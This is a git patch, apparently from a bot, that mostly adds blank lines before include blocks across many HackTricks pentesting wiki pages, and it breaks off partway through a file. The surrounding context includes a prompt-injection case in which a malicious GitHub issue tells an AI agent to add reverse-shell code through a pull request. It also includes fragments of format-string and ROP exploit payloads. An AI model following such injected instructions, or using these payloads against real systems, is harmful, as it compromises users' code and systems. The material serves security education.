From 4b90965712475fb63ce05d5b51299f3c52404718 Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Wed, 20 Aug 2025 12:46:23 +0000 Subject: [PATCH] Add content from: FiberGateway GR241AG - Full Exploit Chain --- src/AI/AI-MCP-Servers.md | 3 +- src/AI/AI-llm-architecture/README.md | 10 +++ src/AI/README.md | 10 +++ .../aw2exec-__malloc_hook.md | 2 + .../arbitrary-write-2-exec/aw2exec-got-plt.md | 3 +- .../README.md | 4 +- .../elf-tricks.md | 7 +- .../aslr/README.md | 5 +- .../pie/README.md | 2 +- .../stack-canaries/README.md | 4 +- .../stack-canaries/print-stack-canary.md | 2 +- .../format-strings/README.md | 3 +- src/binary-exploitation/libc-heap/README.md | 2 + .../libc-heap/bins-and-memory-allocations.md | 4 +- .../libc-heap/fast-bin-attack.md | 3 +- .../heap-functions-security-checks.md | 4 +- .../libc-heap/house-of-roman.md | 2 +- .../libc-heap/large-bin-attack.md | 2 +- .../libc-heap/tcache-bin-attack.md | 2 +- .../libc-heap/unsorted-bin-attack.md | 2 +- .../libc-heap/use-after-free/README.md | 2 +- .../rop-return-oriented-programing/README.md | 5 +- .../rop-return-oriented-programing/ret2csu.md | 2 +- .../ret2dlresolve.md | 2 +- .../ret2lib/README.md | 7 +- .../rop-leaking-libc-address/README.md | 3 +- .../ret2vdso.md | 2 +- .../rop-syscall-execv/README.md | 2 +- .../rop-syscall-execv/ret2syscall-arm64.md | 3 +- .../README.md | 3 +- .../srop-arm64.md | 2 + .../stack-overflow/README.md | 6 +- .../stack-overflow/ret2win/README.md | 2 +- .../stack-overflow/ret2win/ret2win-arm64.md | 2 +- .../stack-pivoting-ebp2ret-ebp-chaining.md | 3 + .../stack-shellcode/stack-shellcode-arm64.md | 2 +- src/crypto-and-stego/esoteric-languages.md | 2 +- .../hash-length-extension-attack.md | 2 +- .../rc4-encrypt-and-decrypt.md | 3 +- .../basic-forensic-methodology/README.md | 13 +++- .../linux-forensics.md | 2 +- .../partitions-file-systems-carving/README.md | 4 +- .../pcap-inspection/README.md | 7 +- .../README.md | 10 ++- .../windows-forensics/README.md | 2 +- .../external-recon-methodology/README.md | 5 +- .../pentesting-network/README.md | 8 ++- .../pentesting-network/pentesting-ipv6.md | 66 +++++++++++++++++-- ...-ns-mdns-dns-and-wpad-and-relay-attacks.md | 2 +- .../pentesting-wifi/README.md | 2 +- .../phishing-methodology/README.md | 7 +- .../clipboard-hijacking.md | 5 +- .../phishing-documents.md | 3 +- .../python/bypass-python-sandboxes/README.md | 3 + ...s-pollution-pythons-prototype-pollution.md | 2 +- .../firmware-analysis/README.md | 3 +- .../bypass-bash-restrictions/README.md | 3 +- .../README.md | 2 +- src/linux-hardening/freeipa-pentesting.md | 2 +- .../linux-post-exploitation/README.md | 2 +- .../privilege-escalation/README.md | 18 ++++- .../containerd-ctr-privilege-escalation.md | 3 +- .../docker-security/README.md | 13 +++- .../README.md | 6 +- .../docker-security/docker-privileged.md | 5 +- .../docker-security/namespaces/README.md | 8 ++- .../namespaces/cgroup-namespace.md | 2 +- .../escaping-from-limited-bash.md | 3 +- .../interesting-groups-linux-pe/README.md | 5 +- .../linux-active-directory.md | 4 +- .../linux-capabilities.md | 2 +- .../nfs-no_root_squash-misconfiguration-pe.md | 2 +- .../runc-privilege-escalation.md | 2 +- .../wildcards-spare-tricks.md | 50 +++++++++++++- .../macos-red-teaming/README.md | 7 +- .../macos-red-teaming/macos-mdm/README.md | 3 +- .../README.md | 12 +++- .../mac-os-architecture/README.md | 5 +- .../README.md | 6 +- .../README.md | 3 +- .../macos-bypassing-firewalls.md | 1 + .../README.md | 6 +- .../macos-privilege-escalation.md | 4 +- .../macos-proces-abuse/README.md | 11 +++- .../README.md | 6 +- .../macos-xpc/README.md | 3 +- .../macos-xpc/macos-xpc-authorization.md | 2 +- .../README.md | 3 +- ...s-xpc_connection_get_audit_token-attack.md | 3 +- .../macos-library-injection/README.md | 4 +- .../macos-dyld-process.md | 2 +- .../macos-security-protections/README.md | 6 +- .../macos-fs-tricks/README.md | 2 +- .../macos-sandbox/README.md | 2 +- .../macos-sandbox-debug-and-bypass/README.md | 5 +- .../macos-tcc/README.md | 4 +- .../macos-tcc/macos-tcc-bypasses/README.md | 5 +- .../android-app-pentesting/README.md | 11 +++- .../avd-android-virtual-device.md | 2 +- .../android-app-pentesting/tapjacking.md | 3 +- .../ios-pentesting/README.md | 16 ++++- .../frida-configuration-in-ios.md | 2 +- .../ios-pentesting/ios-testing-environment.md | 3 +- .../11211-memcache/README.md | 2 +- .../137-138-139-pentesting-netbios.md | 2 +- .../2375-pentesting-docker.md | 2 +- .../5353-udp-multicast-dns-mdns.md | 2 +- .../5439-pentesting-redshift.md | 1 + .../5555-android-debug-bridge.md | 1 + .../8089-splunkd.md | 2 +- .../9000-pentesting-fastcgi.md | 2 +- src/network-services-pentesting/9100-pjl.md | 1 + .../9200-pentesting-elasticsearch.md | 1 + .../nfs-service-pentesting.md | 2 +- .../pentesting-compaq-hp-insight-manager.md | 1 + .../pentesting-kerberos-88/README.md | 1 + .../README.md | 6 +- .../pentesting-mysql.md | 2 +- .../pentesting-postgresql.md | 6 +- .../pentesting-rdp.md | 2 +- .../pentesting-smb/README.md | 3 +- .../pentesting-smtp/README.md | 2 +- .../pentesting-snmp/README.md | 3 +- .../pentesting-ssh.md | 1 + .../pentesting-voip/README.md | 2 +- .../basic-voip-protocols/README.md | 2 +- .../pentesting-web/README.md | 5 +- .../pentesting-web/buckets/README.md | 1 + .../buckets/firebase-database.md | 1 + .../pentesting-web/drupal/README.md | 2 +- .../electron-desktop-apps/README.md | 6 +- ...solation-rce-via-electron-internal-code.md | 1 + .../pentesting-web/flask.md | 2 + .../pentesting-web/graphql.md | 3 + .../pentesting-web/microsoft-sharepoint.md | 4 +- .../pentesting-web/nextjs.md | 2 +- .../pentesting-web/nginx.md | 2 +- .../pentesting-web/php-tricks-esp/README.md | 3 + .../pentesting-web/python.md | 4 +- .../pentesting-web/special-http-headers.md | 5 +- .../pentesting-web/symphony.md | 1 + .../pentesting-web/uncovering-cloudflare.md | 1 + .../pentesting-web/werkzeug.md | 1 + .../pentesting-web/wordpress.md | 1 + src/pentesting-web/account-takeover.md | 8 ++- .../README.md | 7 +- .../browext-clickjacking.md | 3 +- src/pentesting-web/cache-deception/README.md | 5 +- src/pentesting-web/captcha-bypass.md | 1 + .../client-side-template-injection-csti.md | 1 + src/pentesting-web/command-injection.md | 3 + .../README.md | 5 +- src/pentesting-web/cors-bypass.md | 3 +- src/pentesting-web/crlf-0d-0a.md | 2 + .../csrf-cross-site-request-forgery.md | 2 +- .../README.md | 3 + src/pentesting-web/deserialization/README.md | 8 ++- .../exploiting-__viewstate-parameter.md | 6 +- .../README.md | 2 + src/pentesting-web/file-inclusion/README.md | 11 ++++ .../file-inclusion/phar-deserialization.md | 1 + src/pentesting-web/file-upload/README.md | 1 + .../hacking-jwt-json-web-tokens.md | 3 +- .../hacking-with-cookies/README.md | 4 +- .../hacking-with-cookies/cookie-tossing.md | 3 +- .../http-request-smuggling/README.md | 5 +- src/pentesting-web/ldap-injection.md | 3 +- src/pentesting-web/login-bypass/README.md | 2 +- .../oauth-to-account-takeover.md | 1 + src/pentesting-web/open-redirect.md | 2 +- .../postmessage-vulnerabilities/README.md | 5 +- .../proxy-waf-protections-bypass.md | 2 +- .../registration-vulnerabilities.md | 4 +- src/pentesting-web/reset-password.md | 2 +- src/pentesting-web/saml-attacks/README.md | 4 +- ...inclusion-edge-side-inclusion-injection.md | 2 + src/pentesting-web/sql-injection/README.md | 4 ++ .../sql-injection/mssql-injection.md | 2 +- .../postgresql-injection/README.md | 2 +- .../rce-with-postgresql-extensions.md | 2 + .../rce-with-postgresql-languages.md | 3 +- .../README.md | 6 ++ .../ssrf-vulnerable-platforms.md | 2 +- .../url-format-bypass.md | 1 + .../README.md | 6 ++ .../jinja2-ssti.md | 2 +- .../unicode-injection/README.md | 2 +- .../unicode-normalization.md | 1 + .../web-vulnerabilities-methodology.md | 1 + .../web-vulnerabilities-methodology/README.md | 2 +- src/pentesting-web/websocket-attacks.md | 2 +- src/pentesting-web/xs-search.md | 12 +++- src/pentesting-web/xs-search/README.md | 12 +++- .../connection-pool-by-destination-example.md | 2 +- .../event-loop-blocking-+-lazy-images.md | 2 +- ...ble-stylesheet-language-transformations.md | 1 + .../xss-cross-site-scripting/README.md | 20 ++++++ .../abusing-service-workers.md | 2 +- .../xss-cross-site-scripting/dom-xss.md | 2 +- .../iframes-in-xss-and-csp.md | 4 ++ .../integer-overflow.md | 3 +- .../xxe-xee-xml-external-entity.md | 5 +- .../reversing-tools-basic-methods/README.md | 5 ++ src/todo/burp-suite.md | 1 + src/todo/hardware-hacking/jtag.md | 1 + src/todo/other-web-tricks.md | 1 + .../flipper-zero/fz-125khz-rfid.md | 2 +- .../radio-hacking/flipper-zero/fz-ibutton.md | 2 +- .../radio-hacking/flipper-zero/fz-infrared.md | 2 +- src/todo/radio-hacking/flipper-zero/fz-nfc.md | 2 +- src/todo/radio-hacking/ibutton.md | 2 +- src/todo/radio-hacking/infrared.md | 1 + src/todo/radio-hacking/pentesting-rfid.md | 5 +- src/todo/radio-hacking/sub-ghz-rf.md | 2 +- .../active-directory-methodology/README.md | 41 +++++++++++- .../abusing-ad-mssql.md | 3 +- .../acl-persistence-abuse/README.md | 2 +- .../ad-certificates/account-persistence.md | 1 + .../ad-certificates/certificate-theft.md | 2 +- .../ad-certificates/domain-escalation.md | 3 +- .../badsuccessor-dmsa-migration-abuse.md | 1 + .../bloodhound.md | 1 + .../external-forest-domain-oneway-inbound.md | 2 +- .../golden-ticket.md | 2 +- .../printers-spooler-service-abuse.md | 2 + .../resource-based-constrained-delegation.md | 2 + ...nagement-point-relay-sql-policy-secrets.md | 6 +- .../sid-history-injection.md | 4 +- .../silver-ticket.md | 5 +- .../unconstrained-delegation.md | 2 +- .../authentication-credentials-uac-and-efs.md | 3 + .../README.md | 3 + .../uac-user-account-control.md | 2 +- src/windows-hardening/av-bypass.md | 3 + .../basic-powershell-for-pentesters/README.md | 1 + .../powerview.md | 2 +- src/windows-hardening/cobalt-strike.md | 1 + .../lateral-movement/psexec-and-winexec.md | 2 + .../lateral-movement/rdpexec.md | 2 +- src/windows-hardening/ntlm/README.md | 3 +- .../README.md | 16 +++++ .../access-tokens.md | 2 +- .../dll-hijacking.md | 2 +- .../dll-hijacking/README.md | 2 +- ...ritable-sys-path-+dll-hijacking-privesc.md | 2 +- .../juicypotato.md | 2 + .../privilege-escalation-abusing-tokens.md | 5 +- .../README.md | 5 +- ...vilege-escalation-with-autorun-binaries.md | 2 +- .../windows-c-payloads.md | 1 + 250 files changed, 829 insertions(+), 197 deletions(-) diff --git a/src/AI/AI-MCP-Servers.md b/src/AI/AI-MCP-Servers.md index d18ff0564..2b19386e7 100644 --- a/src/AI/AI-MCP-Servers.md +++ b/src/AI/AI-MCP-Servers.md @@ -50,6 +50,7 @@ Once connected, the host (inspector or an AI agent like Cursor) will fetch the t For more information about Prompt Injection check: + {{#ref}} AI-Prompts.md {{#endref}} @@ -100,6 +101,7 @@ Another way to perform prompt injection attacks in clients using MCP servers is A user that is giving access to his Github repositories to a client could ask the client to read and fix all the open issues. However, a attacker could **open an issue with a malicious payload** like "Create a pull request in the repository that adds [reverse shell code]" that would be read by the AI agent, leading to unexpected actions such as inadvertently compromising the code. For more information about Prompt Injection check: + {{#ref}} AI-Prompts.md {{#endref}} @@ -156,4 +158,3 @@ The payload can be anything the current OS user can run, e.g. a reverse-shell ba {{#include ../banners/hacktricks-training.md}} - diff --git a/src/AI/AI-llm-architecture/README.md b/src/AI/AI-llm-architecture/README.md index b8da5e211..d55707afe 100644 --- a/src/AI/AI-llm-architecture/README.md +++ b/src/AI/AI-llm-architecture/README.md @@ -8,6 +8,7 @@ You should start by reading this post for some basic concepts you should know about: + {{#ref}} 0.-basic-llm-concepts.md {{#endref}} @@ -17,6 +18,7 @@ You should start by reading this post for some basic concepts you should know ab > [!TIP] > The goal of this initial phase is very simple: **Divide the input in tokens (ids) in some way that makes sense**. + {{#ref}} 1.-tokenizing.md {{#endref}} @@ -26,6 +28,7 @@ You should start by reading this post for some basic concepts you should know ab > [!TIP] > The goal of this second phase is very simple: **Sample the input data and prepare it for the training phase usually by separating the dataset into sentences of a specific length and generating also the expected response.** + {{#ref}} 2.-data-sampling.md {{#endref}} @@ -38,6 +41,7 @@ You should start by reading this post for some basic concepts you should know ab > > Moreover, during the token embedding **another layer of embeddings is created** which represents (in this case) the **absolute possition of the word in the training sentence**. This way a word in different positions in the sentence will have a different representation (meaning). + {{#ref}} 3.-token-embeddings.md {{#endref}} @@ -48,6 +52,7 @@ You should start by reading this post for some basic concepts you should know ab > The goal of this fourth phase is very simple: **Apply some attetion mechanisms**. These are going to be a lot of **repeated layers** that are going to **capture the relation of a word in the vocabulary with its neighbours in the current sentence being used to train the LLM**.\ > A lot of layers are used for this, so a lot of trainable parameters are going to be capturing this information. + {{#ref}} 4.-attention-mechanisms.md {{#endref}} @@ -59,6 +64,7 @@ You should start by reading this post for some basic concepts you should know ab > > This architecture will be used for both, training and predicting text after it was trained. + {{#ref}} 5.-llm-architecture.md {{#endref}} @@ -68,6 +74,7 @@ You should start by reading this post for some basic concepts you should know ab > [!TIP] > The goal of this sixth phase is very simple: **Train the model from scratch**. For this the previous LLM architecture will be used with some loops going over the data sets using the defined loss functions and optimizer to train all the parameters of the model. + {{#ref}} 6.-pre-training-and-loading-models.md {{#endref}} @@ -77,6 +84,7 @@ You should start by reading this post for some basic concepts you should know ab > [!TIP] > The use of **LoRA reduce a lot the computation** needed to **fine tune** already trained models. + {{#ref}} 7.0.-lora-improvements-in-fine-tuning.md {{#endref}} @@ -86,6 +94,7 @@ You should start by reading this post for some basic concepts you should know ab > [!TIP] > The goal of this section is to show how to fine-tune an already pre-trained model so instead of generating new text the LLM will select give the **probabilities of the given text being categorized in each of the given categories** (like if a text is spam or not). + {{#ref}} 7.1.-fine-tuning-for-classification.md {{#endref}} @@ -95,6 +104,7 @@ You should start by reading this post for some basic concepts you should know ab > [!TIP] > The goal of this section is to show how to **fine-tune an already pre-trained model to follow instructions** rather than just generating text, for example, responding to tasks as a chat bot. + {{#ref}} 7.2.-fine-tuning-to-follow-instructions.md {{#endref}} diff --git a/src/AI/README.md b/src/AI/README.md index d31750f5a..166744525 100644 --- a/src/AI/README.md +++ b/src/AI/README.md @@ -6,18 +6,22 @@ The best starting point to learn about AI is to understand how the main machine learning algorithms work. This will help you to understand how AI works, how to use it and how to attack it: + {{#ref}} ./AI-Supervised-Learning-Algorithms.md {{#endref}} + {{#ref}} ./AI-Unsupervised-Learning-Algorithms.md {{#endref}} + {{#ref}} ./AI-Reinforcement-Learning-Algorithms.md {{#endref}} + {{#ref}} ./AI-Deep-Learning.md {{#endref}} @@ -26,6 +30,7 @@ The best starting point to learn about AI is to understand how the main machine In the following page you will find the basics of each component to build a basic LLM using transformers: + {{#ref}} AI-llm-architecture/README.md {{#endref}} @@ -36,6 +41,7 @@ AI-llm-architecture/README.md At this moment, the main 2 frameworks to assess the risks of AI systems are the OWASP ML Top 10 and the Google SAIF: + {{#ref}} AI-Risk-Frameworks.md {{#endref}} @@ -44,6 +50,7 @@ AI-Risk-Frameworks.md LLMs have made the use of AI explode in the last years, but they are not perfect and can be tricked by adversarial prompts. This is a very important topic to understand how to use AI safely and how to attack it: + {{#ref}} AI-Prompts.md {{#endref}} @@ -52,6 +59,7 @@ AI-Prompts.md It's very common to developers and companies to run models downloaded from the Internet, however just loading a model might be enough to execute arbitrary code on the system. This is a very important topic to understand how to use AI safely and how to attack it: + {{#ref}} AI-Models-RCE.md {{#endref}} @@ -60,12 +68,14 @@ AI-Models-RCE.md MCP (Model Context Protocol) is a protocol that allows AI agent clients to connect with external tools and data sources in a plug-and-play fashion. This enables complex workflows and interactions between AI models and external systems: + {{#ref}} AI-MCP-Servers.md {{#endref}} ### AI-Assisted Fuzzing & Automated Vulnerability Discovery + {{#ref}} AI-Assisted-Fuzzing-and-Vulnerability-Discovery.md {{#endref}} diff --git a/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-__malloc_hook.md b/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-__malloc_hook.md index fd1e44f73..9239931a3 100644 --- a/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-__malloc_hook.md +++ b/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-__malloc_hook.md @@ -10,6 +10,7 @@ To call malloc it's possible to wait for the program to call it or by **calling More info about One Gadget in: + {{#ref}} ../rop-return-oriented-programing/ret2lib/one-gadget.md {{#endref}} @@ -21,6 +22,7 @@ More info about One Gadget in: This was abused in one of the example from the page abusing a fast bin attack after having abused an unsorted bin attack: + {{#ref}} ../libc-heap/unsorted-bin-attack.md {{#endref}} diff --git a/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.md b/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.md index 28eb4d66b..596ed2a4d 100644 --- a/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.md +++ b/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.md @@ -62,6 +62,7 @@ Moreover, if `puts` is used with user input, it's possible to overwrite the `str ## **One Gadget** + {{#ref}} ../rop-return-oriented-programing/ret2lib/one-gadget.md {{#endref}} @@ -77,6 +78,7 @@ It's possible to find an [**example here**](https://ctf-wiki.mahaloz.re/pwn/linu The **Full RELRO** protection is meant to protect agains this kind of technique by resolving all the addresses of the functions when the binary is started and making the **GOT table read only** after it: + {{#ref}} ../common-binary-protections-and-bypasses/relro.md {{#endref}} @@ -89,4 +91,3 @@ The **Full RELRO** protection is meant to protect agains this kind of technique {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/binary-exploitation/basic-stack-binary-exploitation-methodology/README.md b/src/binary-exploitation/basic-stack-binary-exploitation-methodology/README.md index fb7b1d7d3..865d1db9e 100644 --- a/src/binary-exploitation/basic-stack-binary-exploitation-methodology/README.md +++ b/src/binary-exploitation/basic-stack-binary-exploitation-methodology/README.md @@ -6,12 +6,14 @@ Before start exploiting anything it's interesting to understand part of the structure of an **ELF binary**: + {{#ref}} elf-tricks.md {{#endref}} ## Exploiting Tools + {{#ref}} tools/ {{#endref}} @@ -34,6 +36,7 @@ There are different was you could end controlling the flow of a program: You can find the **Write What Where to Execution** techniques in: + {{#ref}} ../arbitrary-write-2-exec/ {{#endref}} @@ -111,4 +114,3 @@ Something to take into account is that usually **just one exploitation of a vuln {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/binary-exploitation/basic-stack-binary-exploitation-methodology/elf-tricks.md b/src/binary-exploitation/basic-stack-binary-exploitation-methodology/elf-tricks.md index 0df3552a1..ca1b512cf 100644 --- a/src/binary-exploitation/basic-stack-binary-exploitation-methodology/elf-tricks.md +++ b/src/binary-exploitation/basic-stack-binary-exploitation-methodology/elf-tricks.md @@ -68,6 +68,7 @@ This stores vendor metadata information about the binary. - On x86-64, `readelf -n` will show `GNU_PROPERTY_X86_FEATURE_1_*` flags inside `.note.gnu.property`. If you see `IBT` and/or `SHSTK`, the binary was built with CET (Indirect Branch Tracking and/or Shadow Stack). This impacts ROP/JOP because indirect branch targets must start with an `ENDBR64` instruction and returns are checked against a shadow stack. See the CET page for details and bypass notes. + {{#ref}} ../common-binary-protections-and-bypasses/cet-and-shadow-stack.md {{#endref}} @@ -92,6 +93,7 @@ Note that RELRO can be partial or full, the partial version do not protect the s > For exploitation techniques and up-to-date bypass notes, check the dedicated page: + {{#ref}} ../common-binary-protections-and-bypasses/relro.md {{#endref}} @@ -372,7 +374,8 @@ So when a program calls to malloc, it actually calls the corresponding location - `-z now` (Full RELRO) disables lazy binding; PLT entries still exist but GOT/PLT is mapped read-only, so techniques like **GOT overwrite** and **ret2dlresolve** won’t work against the main binary (libraries may still be partially RELRO). See: - {{#ref}} + +{{#ref}} ../common-binary-protections-and-bypasses/relro.md {{#endref}} @@ -382,6 +385,7 @@ So when a program calls to malloc, it actually calls the corresponding location > If GOT/PLT is not an option, pivot to other writeable code-pointers or use classic ROP/SROP into libc. + {{#ref}} ../arbitrary-write-2-exec/aw2exec-got-plt.md {{#endref}} @@ -432,6 +436,7 @@ Moreover, it's also possible to have a **`PREINIT_ARRAY`** with **pointers** tha - For lazy binding abuse of the dynamic linker to resolve arbitrary symbols at runtime, see the dedicated page: + {{#ref}} ../rop-return-oriented-programing/ret2dlresolve.md {{#endref}} diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/aslr/README.md b/src/binary-exploitation/common-binary-protections-and-bypasses/aslr/README.md index 6af429529..b01aa318f 100644 --- a/src/binary-exploitation/common-binary-protections-and-bypasses/aslr/README.md +++ b/src/binary-exploitation/common-binary-protections-and-bypasses/aslr/README.md @@ -210,6 +210,7 @@ p.interactive() Abusing a buffer overflow it would be possible to exploit a **ret2plt** to exfiltrate an address of a function from the libc. Check: + {{#ref}} ret2plt.md {{#endref}} @@ -231,6 +232,7 @@ payload += p32(elf.symbols['main']) You can find more info about Format Strings arbitrary read in: + {{#ref}} ../../format-strings/ {{#endref}} @@ -239,6 +241,7 @@ You can find more info about Format Strings arbitrary read in: Try to bypass ASLR abusing addresses inside the stack: + {{#ref}} ret2ret.md {{#endref}} @@ -297,6 +300,7 @@ gef➤ x/4i 0xffffffffff600800 Note therefore how it might be possible to **bypass ASLR abusing the vdso** if the kernel is compiled with CONFIG_COMPAT_VDSO as the vdso address won't be randomized. For more info check: + {{#ref}} ../../rop-return-oriented-programing/ret2vdso.md {{#endref}} @@ -304,4 +308,3 @@ Note therefore how it might be possible to **bypass ASLR abusing the vdso** if t {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/pie/README.md b/src/binary-exploitation/common-binary-protections-and-bypasses/pie/README.md index c9e320b49..e95e9ef78 100644 --- a/src/binary-exploitation/common-binary-protections-and-bypasses/pie/README.md +++ b/src/binary-exploitation/common-binary-protections-and-bypasses/pie/README.md @@ -19,6 +19,7 @@ In order to bypass PIE it's needed to **leak some address of the loaded** binary - Be **given** the leak (common in easy CTF challenges, [**check this example**](https://ir0nstone.gitbook.io/notes/types/stack/pie/pie-exploit)) - **Brute-force EBP and EIP values** in the stack until you leak the correct ones: + {{#ref}} bypassing-canary-and-pie.md {{#endref}} @@ -32,4 +33,3 @@ bypassing-canary-and-pie.md {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/README.md b/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/README.md index 99441d5db..36da583ff 100644 --- a/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/README.md +++ b/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/README.md @@ -33,12 +33,14 @@ In `x86` binaries, the canary cookie is a **`0x4`** byte dword. The f**irst thre - If the **canary is forked in child processes** it might be possible to **brute-force** it one byte at a time: + {{#ref}} bf-forked-stack-canaries.md {{#endref}} - If there is some interesting **leak or arbitrary read vulnerability** in the binary it might be possible to leak it: + {{#ref}} print-stack-canary.md {{#endref}} @@ -47,6 +49,7 @@ print-stack-canary.md The stack vulnerable to a stack overflow might **contain addresses to strings or functions that can be overwritten** in order to exploit the vulnerability without needing to reach the stack canary. Check: + {{#ref}} ../../stack-overflow/pointer-redirecting.md {{#endref}} @@ -76,4 +79,3 @@ This attack is performed in the writeup: [https://7rocky.github.io/en/ctf/other/ {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/print-stack-canary.md b/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/print-stack-canary.md index 1ce942487..b886dd25a 100644 --- a/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/print-stack-canary.md +++ b/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/print-stack-canary.md @@ -23,6 +23,7 @@ Obviously, this tactic is very **restricted** as the attacker needs to be able t With an **arbitrary read** like the one provided by format **strings** it might be possible to leak the canary. Check this example: [**https://ir0nstone.gitbook.io/notes/types/stack/canaries**](https://ir0nstone.gitbook.io/notes/types/stack/canaries) and you can read about abusing format strings to read arbitrary memory addresses in: + {{#ref}} ../../format-strings/ {{#endref}} @@ -33,4 +34,3 @@ With an **arbitrary read** like the one provided by format **strings** it might {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/binary-exploitation/format-strings/README.md b/src/binary-exploitation/format-strings/README.md index 1bc091c36..a839a140f 100644 --- a/src/binary-exploitation/format-strings/README.md +++ b/src/binary-exploitation/format-strings/README.md @@ -168,6 +168,7 @@ Therefore, this vulnerability allows to **write anything in any address (arbitra In this example, the goal is going to be to **overwrite** the **address** of a **function** in the **GOT** table that is going to be called later. Although this could abuse other arbitrary write to exec techniques: + {{#ref}} ../arbitrary-write-2-exec/ {{#endref}} @@ -196,6 +197,7 @@ python -c 'print "\x26\x97\x04\x08"+"\x24\x97\x04\x08"+ "%.49143x" + "%4$hn" + " You can find a **template** to prepare a exploit for this kind of vulnerability in: + {{#ref}} format-strings-template.md {{#endref}} @@ -241,4 +243,3 @@ It's possible to abuse the write actions of a format string vulnerability to **w {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/binary-exploitation/libc-heap/README.md b/src/binary-exploitation/libc-heap/README.md index 5fe3757f9..f506059d7 100644 --- a/src/binary-exploitation/libc-heap/README.md +++ b/src/binary-exploitation/libc-heap/README.md @@ -513,6 +513,7 @@ and inside of it some chunks can be found: Check what are the bins and how are they organized and how memory is allocated and freed in: + {{#ref}} bins-and-memory-allocations.md {{#endref}} @@ -521,6 +522,7 @@ bins-and-memory-allocations.md Functions involved in heap will perform certain check before performing its actions to try to make sure the heap wasn't corrupted: + {{#ref}} heap-memory-functions/heap-functions-security-checks.md {{#endref}} diff --git a/src/binary-exploitation/libc-heap/bins-and-memory-allocations.md b/src/binary-exploitation/libc-heap/bins-and-memory-allocations.md index 67dc1a77f..39ff87f18 100644 --- a/src/binary-exploitation/libc-heap/bins-and-memory-allocations.md +++ b/src/binary-exploitation/libc-heap/bins-and-memory-allocations.md @@ -610,6 +610,7 @@ When malloc is used and a chunk is divided (from the unsorted bin or from the to Check out: + {{#ref}} heap-memory-functions/malloc-and-sysmalloc.md {{#endref}} @@ -618,6 +619,7 @@ heap-memory-functions/malloc-and-sysmalloc.md Check out: + {{#ref}} heap-memory-functions/free.md {{#endref}} @@ -626,6 +628,7 @@ heap-memory-functions/free.md Check the security checks performed by heavily used functions in heap in: + {{#ref}} heap-memory-functions/heap-functions-security-checks.md {{#endref}} @@ -640,4 +643,3 @@ heap-memory-functions/heap-functions-security-checks.md {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/binary-exploitation/libc-heap/fast-bin-attack.md b/src/binary-exploitation/libc-heap/fast-bin-attack.md index ebe65b793..b5b26e744 100644 --- a/src/binary-exploitation/libc-heap/fast-bin-attack.md +++ b/src/binary-exploitation/libc-heap/fast-bin-attack.md @@ -6,6 +6,7 @@ For more information about what is a fast bin check this page: + {{#ref}} bins-and-memory-allocations.md {{#endref}} @@ -146,6 +147,7 @@ int main(void) - Overwrite `global_max_fast` using an Unsorted Bin attack (works 1/16 times due to ASLR, because we need to modify 12 bits, but we must modify 16 bits). - Fast Bin attack to modify the a global array of chunks. This gives an arbitrary read/write primitive, which allows to modify the GOT and set some function to point to `system`. + {{#ref}} unsorted-bin-attack.md {{#endref}} @@ -153,4 +155,3 @@ unsorted-bin-attack.md {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/binary-exploitation/libc-heap/heap-memory-functions/heap-functions-security-checks.md b/src/binary-exploitation/libc-heap/heap-memory-functions/heap-functions-security-checks.md index b7161610a..d30975233 100644 --- a/src/binary-exploitation/libc-heap/heap-memory-functions/heap-functions-security-checks.md +++ b/src/binary-exploitation/libc-heap/heap-memory-functions/heap-functions-security-checks.md @@ -6,6 +6,7 @@ For more info check: + {{#ref}} unlink.md {{#endref}} @@ -23,6 +24,7 @@ This is a summary of the performed checks: For more info check: + {{#ref}} malloc-and-sysmalloc.md {{#endref}} @@ -94,6 +96,7 @@ malloc-and-sysmalloc.md For more info check: + {{#ref}} free.md {{#endref}} @@ -163,4 +166,3 @@ free.md {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/binary-exploitation/libc-heap/house-of-roman.md b/src/binary-exploitation/libc-heap/house-of-roman.md index a747e2741..bf8d3a1d0 100644 --- a/src/binary-exploitation/libc-heap/house-of-roman.md +++ b/src/binary-exploitation/libc-heap/house-of-roman.md @@ -75,6 +75,7 @@ uint8_t* malloc_hook_chunk = malloc(0x60); For more info you can check: + {{#ref}} unsorted-bin-attack.md {{#endref}} @@ -118,4 +119,3 @@ Finally, one the correct address is overwritten, **call `malloc` and trigger the {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/binary-exploitation/libc-heap/large-bin-attack.md b/src/binary-exploitation/libc-heap/large-bin-attack.md index 76184cb0a..14603492b 100644 --- a/src/binary-exploitation/libc-heap/large-bin-attack.md +++ b/src/binary-exploitation/libc-heap/large-bin-attack.md @@ -6,6 +6,7 @@ For more information about what is a large bin check this page: + {{#ref}} bins-and-memory-allocations.md {{#endref}} @@ -58,4 +59,3 @@ You can find another great explanation of this attack in [**guyinatuxedo**](http {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/binary-exploitation/libc-heap/tcache-bin-attack.md b/src/binary-exploitation/libc-heap/tcache-bin-attack.md index 997b1b384..c28767e7b 100644 --- a/src/binary-exploitation/libc-heap/tcache-bin-attack.md +++ 